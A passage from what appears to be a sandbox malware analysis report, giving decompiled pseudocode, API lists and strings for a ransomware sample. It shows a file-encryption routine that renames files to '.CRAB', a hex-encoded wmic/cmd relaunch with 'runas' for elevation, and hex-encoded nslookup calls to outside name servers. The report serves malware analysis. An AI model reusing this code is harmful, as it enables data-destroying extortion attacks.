				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0fe645c6
0x0fe64662
0x0fe6466c
0x0fe64674
0x0fe6467c
0x0fe64680
0x0fe64688
0x0fe6468c
0x0fe64694
0x0fe64699
0x0fe646a1
0x0fe646a9
0x0fe646b1
0x0fe646b9
0x0fe646c1
0x0fe646c9
0x0fe646d4
0x0fe646df
0x0fe646ea
0x0fe646f5
0x0fe64700
0x0fe6470b
0x0fe64716
0x0fe64721
0x0fe6472c
0x0fe64737
0x0fe64742
0x0fe6474d
0x0fe645cc
0x0fe645ce
0x0fe645d6
0x0fe645de
0x0fe645e2
0x0fe645ea
0x0fe645ee
0x0fe645f6
0x0fe645fe
0x0fe64606
0x0fe6460e
0x0fe64613
0x0fe6461b
0x0fe64623
0x0fe6462b
0x0fe64633
0x0fe6463b
0x0fe64643
0x0fe6464b
0x0fe64653
0x0fe64653
0x0fe64766
0x0fe64775
0x0fe64779
0x0fe64785
0x0fe6478d
0x0fe647a3
0x0fe647ab
0x0fe647ad
0x0fe6477b
0x0fe6477b
0x0fe6477b
0x0fe647b7
0x0fe647c5

APIs

Part of subcall function 0FE63CF0: _memset.LIBCMT ref: 0FE63D42
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
Part of subcall function 0FE63CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FE6476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FE64785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0FE6478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FE647A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE647B7

Strings

e, xrefs: 0FE64643
, xrefs: 0FE646A1
, xrefs: 0FE646EA
h, xrefs: 0FE646F5
a, xrefs: 0FE64721
e, xrefs: 0FE6464B
i, xrefs: 0FE645F6
/, xrefs: 0FE64737
n, xrefs: 0FE646C1
l, xrefs: 0FE6472C
p, xrefs: 0FE64633
., xrefs: 0FE64680
a, xrefs: 0FE646B1
s, xrefs: 0FE64613
x, xrefs: 0FE64606
o, xrefs: 0FE64623
w, xrefs: 0FE6470B
s, xrefs: 0FE646A9
a, xrefs: 0FE6461B
m, xrefs: 0FE645E2
t, xrefs: 0FE646DF
, xrefs: 0FE6463B
, xrefs: 0FE64716
m, xrefs: 0FE646B9
., xrefs: 0FE645FE
w, xrefs: 0FE645EE
x, xrefs: 0FE6468C
e, xrefs: 0FE64653
b, xrefs: 0FE645D6
d, xrefs: 0FE646C9
m, xrefs: 0FE6466C
d, xrefs: 0FE64700
l, xrefs: 0FE646D4
u, xrefs: 0FE64742
/, xrefs: 0FE64699
open, xrefs: 0FE6479C
\, xrefs: 0FE645CE
c, xrefs: 0FE6462B
e, xrefs: 0FE6474D
\, xrefs: 0FE64662

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 0afc8d905ec4e635e6ae835d14fc8aec89f750c53e1f3b60bc336c7a0992178d
Instruction ID: 83dfc24c34d4e78f8b4ca36d800704242c9e2b2c4ba55101326b6caff9ce6e32
Opcode Fuzzy Hash: 0afc8d905ec4e635e6ae835d14fc8aec89f750c53e1f3b60bc336c7a0992178d
Instruction Fuzzy Hash: E14138B0148384DFE320CF119848B5BBEE2BB81B89F00591CE6985A291C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FE63CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0FE63C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0fe63dbf
0x0fe63dc1
0x0fe63dc8
0x0fe63dce
0x0fe63dd5
0x0fe63de7
0x0fe63df4
0x0fe63dfd
0x0fe63e05
0x0fe63e0d
0x0fe63e15
0x0fe63e1d
0x0fe63e25
0x0fe63e2d
0x0fe63e35
0x0fe63e3d
0x0fe63e45
0x0fe63e4d
0x0fe63e55
0x0fe63e5d
0x0fe63e68
0x0fe63e78
0x0fe63e81
0x0fe63e89
0x0fe63e91
0x0fe63e99
0x0fe63ea1
0x0fe63ea9
0x0fe63eb1
0x0fe63eb9
0x0fe63ec4
0x0fe63ecf
0x0fe63eda
0x0fe63ee5
0x0fe63ef0
0x0fe63efb
0x0fe63f06
0x0fe63f11
0x0fe63f1c
0x0fe63f27
0x0fe63f41
0x0fe63f43
0x0fe63f49
0x0fe63f50
0x0fe63f5c
0x0fe63f5e
0x0fe63f65
0x0fe63f6d
0x0fe63f75
0x0fe63f7d
0x0fe63f87
0x0fe63f91
0x0fe63f94
0x0fe63f9b
0x0fe63fa2
0x0fe63fb0
0x0fe63fb1
0x0fe63fb5
0x00000000
0x00000000
0x0fe63fb7
0x0fe63fbb
0x00000000
0x00000000
0x0fe63fc4
0x00000000
0x0fe63fc4
0x0fe63fd6
0x0fe63fdf
0x0fe63fe7
0x0fe63fe7
0x0fe63dd5
0x0fe63fca
0x0fe63fd0

APIs

Part of subcall function 0FE63CF0: _memset.LIBCMT ref: 0FE63D42
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
Part of subcall function 0FE63CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

Part of subcall function 0FE63C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FE63CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FE63E5D
wsprintfW.USER32 ref: 0FE63F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FE63F3B
GetForegroundWindow.USER32 ref: 0FE63F50
ShellExecuteExW.SHELL32(00000000), ref: 0FE63FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE63FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FE63FD6
CloseHandle.KERNEL32(?), ref: 0FE63FDF
ExitProcess.KERNEL32 ref: 0FE63FE7

Strings

\, xrefs: 0FE63E45
%, xrefs: 0FE63DE7
c, xrefs: 0FE63E91
, xrefs: 0FE63EDA
e, xrefs: 0FE63E81
l, xrefs: 0FE63E99
c, xrefs: 0FE63EE5
p, xrefs: 0FE63E68
d, xrefs: 0FE63DFD
n, xrefs: 0FE63F6D
a, xrefs: 0FE63EFB
r, xrefs: 0FE63E05
2, xrefs: 0FE63E2D
s, xrefs: 0FE63E89
s, xrefs: 0FE63EF0
a, xrefs: 0FE63EB1
e, xrefs: 0FE63EB9
e, xrefs: 0FE63E3D
%, xrefs: 0FE63F11
t, xrefs: 0FE63E1D
w, xrefs: 0FE63E35
t, xrefs: 0FE63F06
r, xrefs: 0FE63F65
", xrefs: 0FE63F1C
m, xrefs: 0FE63ECF
m, xrefs: 0FE63E25
\, xrefs: 0FE63E0D
r, xrefs: 0FE63EA9
i, xrefs: 0FE63DF4
y, xrefs: 0FE63E15
s, xrefs: 0FE63F75
c, xrefs: 0FE63E55
", xrefs: 0FE63EC4
o, xrefs: 0FE63E78
, xrefs: 0FE63EA1

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: a21af672b5fa1719efb7f604856275fed513ce5a532ae3587b463059e2779d0b
Instruction ID: abbea56565a493e718287e3e7b90639c6aa320c1489ecf09ce49804fd62ebe9c
Opcode Fuzzy Hash: a21af672b5fa1719efb7f604856275fed513ce5a532ae3587b463059e2779d0b
Instruction Fuzzy Hash: E3515AB0408344DFE3208F11C44878BBFF9BF85799F00492DE69896251C7FA9158CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE637B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0FE637B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FE66500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FE68400( &_v104, 0x10);
				E0FE68400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FE66660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FE66660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FE68520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FE68B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FE636D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0fe637bb
0x0fe637bd
0x0fe637c1
0x0fe637cf
0x0fe637d8
0x0fe637e3
0x0fe637ef
0x0fe637f1
0x0fe6380c
0x0fe6380e
0x0fe63817
0x0fe6381a
0x0fe63821
0x0fe63828
0x0fe63833
0x0fe63839
0x0fe63846
0x0fe6384e
0x0fe6384f
0x0fe6385a
0x0fe6385f
0x0fe63863
0x0fe6386b
0x0fe63870
0x0fe63880
0x0fe63896
0x0fe63898
0x0fe638ae
0x0fe638b4
0x0fe638b9
0x0fe638bc
0x0fe638c1
0x0fe638c3
0x0fe638c8
0x0fe638d3
0x0fe638d6
0x0fe638da
0x0fe638e1
0x0fe638ef
0x0fe638f4
0x0fe638f9
0x0fe63937
0x0fe6393c
0x0fe63941
0x0fe63970
0x0fe63975
0x0fe63993
0x0fe63995
0x0fe6399b
0x0fe639db
0x0fe639e9
0x0fe639ef
0x0fe639f6
0x0fe639f8
0x0fe639fa
0x0fe639fd
0x0fe63a05
0x0fe63a20
0x0fe63a25
0x0fe63a2b
0x0fe63a37
0x0fe63a3a
0x0fe63a3d
0x0fe63a3f
0x0fe63a42
0x0fe63a45
0x0fe63a4a
0x0fe63a50
0x0fe63a50
0x0fe63a51
0x0fe63a55
0x0fe63a55
0x0fe63a6b
0x0fe63a72
0x0fe63a77
0x0fe63a7a
0x0fe63a7d
0x0fe63a92
0x0fe63aaa
0x0fe63aaf
0x0fe63ab2
0x0fe63ab2
0x0fe63abf
0x0fe63ad2
0x0fe63aed
0x0fe63aef
0x0fe63af4
0x0fe63af4
0x0fe63aff
0x0fe63b05
0x0fe63b0a
0x0fe63a02
0x00000000
0x0fe63a02
0x0fe63b0a
0x00000000
0x0fe63a25
0x0fe63b20
0x0fe63b26
0x0fe63b37
0x0fe63b4c
0x0fe63b5c
0x0fe63b5c
0x0fe63b63
0x0fe63b76
0x0fe63b79
0x0fe63b85
0x0fe63b91
0x0fe63b97
0x0fe63b9f
0x0fe63b9f
0x0fe63ba5
0x0fe6399d
0x0fe639ab
0x0fe639b7
0x0fe639b9
0x0fe639bc
0x0fe639c4
0x0fe639c4
0x0fe63943
0x0fe63943
0x0fe6394f
0x0fe63952
0x0fe6395a
0x0fe6395a
0x0fe638fb
0x0fe63908
0x0fe63914
0x0fe63917
0x0fe6391f
0x0fe6391f
0x0fe63bb2
0x0fe63bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FE637C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FE637CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FE6380A
lstrcpyW.KERNEL32 ref: 0FE63828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0FE63833

Part of subcall function 0FE68400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE68420
Part of subcall function 0FE68400: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FE68448
Part of subcall function 0FE68400: GetModuleHandleA.KERNEL32(?), ref: 0FE6849D
Part of subcall function 0FE68400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE684AB
Part of subcall function 0FE68400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE684BA
Part of subcall function 0FE68400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE684DE
Part of subcall function 0FE68400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE684EC

Part of subcall function 0FE68400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE68500
Part of subcall function 0FE68400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE6850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FE63896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FE638C1

Part of subcall function 0FE66660: EnterCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000,00000000,?,00000800), ref: 0FE6666B
Part of subcall function 0FE66660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FE638F4,00000000,00000000,00000000), ref: 0FE66691
Part of subcall function 0FE66660: GetLastError.KERNEL32(?,0FE638F4,00000000,00000000,00000000), ref: 0FE6669B
Part of subcall function 0FE66660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE638F4,00000000,00000000,00000000), ref: 0FE666B7

MessageBoxA.USER32 ref: 0FE63908
GetLastError.KERNEL32 ref: 0FE63943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FE63BB2

Strings

Fatal error, xrefs: 0FE638FD
., xrefs: 0FE6380E
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FE63902
B, xrefs: 0FE63821
R, xrefs: 0FE6381A
, xrefs: 0FE638DA

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: fa5bc455235d9f309bf26f22316b1be93f55f8f476e9c5a7015aefee2db766b5
Instruction ID: 16b0ef9dadd1afca2eab6e7bcb93990e83c5cfe25759ac2d507dcc58d4057c3d
Opcode Fuzzy Hash: fa5bc455235d9f309bf26f22316b1be93f55f8f476e9c5a7015aefee2db766b5
Instruction Fuzzy Hash: 1BC17EB1E8030DABEB118F94DC45FEEBBB8FF08B54F205125F640BA281DBB469548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE65060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xfe72a70, 0xfe72a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xfe72a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfe72a68, 0xfe72a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xfe72a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0FE64E10(_t64);
								E0FE64FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0fe6506d
0x0fe65078
0x0fe6507b
0x0fe6507f
0x0fe65081
0x0fe6508b
0x0fe65092
0x0fe65095
0x0fe6509e
0x0fe650af
0x0fe650b6
0x0fe650bd
0x0fe650c4
0x0fe650cb
0x0fe650d2
0x0fe650d9
0x0fe650e0
0x0fe650e7
0x0fe650ee
0x0fe650f5
0x0fe650fc
0x0fe65103
0x0fe6510a
0x0fe65111
0x0fe65118
0x0fe6511f
0x0fe65126
0x0fe6512d
0x0fe65134
0x0fe6513b
0x0fe65142
0x0fe65149
0x0fe65150
0x0fe65157
0x0fe6515e
0x0fe65165
0x0fe6516d
0x0fe65189
0x0fe6518d
0x00000000
0x0fe6518f
0x0fe6519f
0x0fe651af
0x0fe651b3
0x00000000
0x0fe651b5
0x0fe651c9
0x0fe651cd
0x0fe6520a
0x0fe65218
0x0fe651cf
0x0fe651d4
0x0fe651df
0x0fe651e8
0x0fe651f5
0x0fe65203
0x0fe65203
0x0fe651cd
0x0fe651b3
0x0fe6516f
0x0fe6516f
0x0fe65178
0x0fe65178

APIs

CreatePipe.KERNEL32(0FE72A70,0FE72A6C,?,00000000,00000001,00000001,00000000), ref: 0FE65165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FE65189
CreatePipe.KERNEL32(0FE72A68,0FE72A74,0000000C,00000000), ref: 0FE6519F
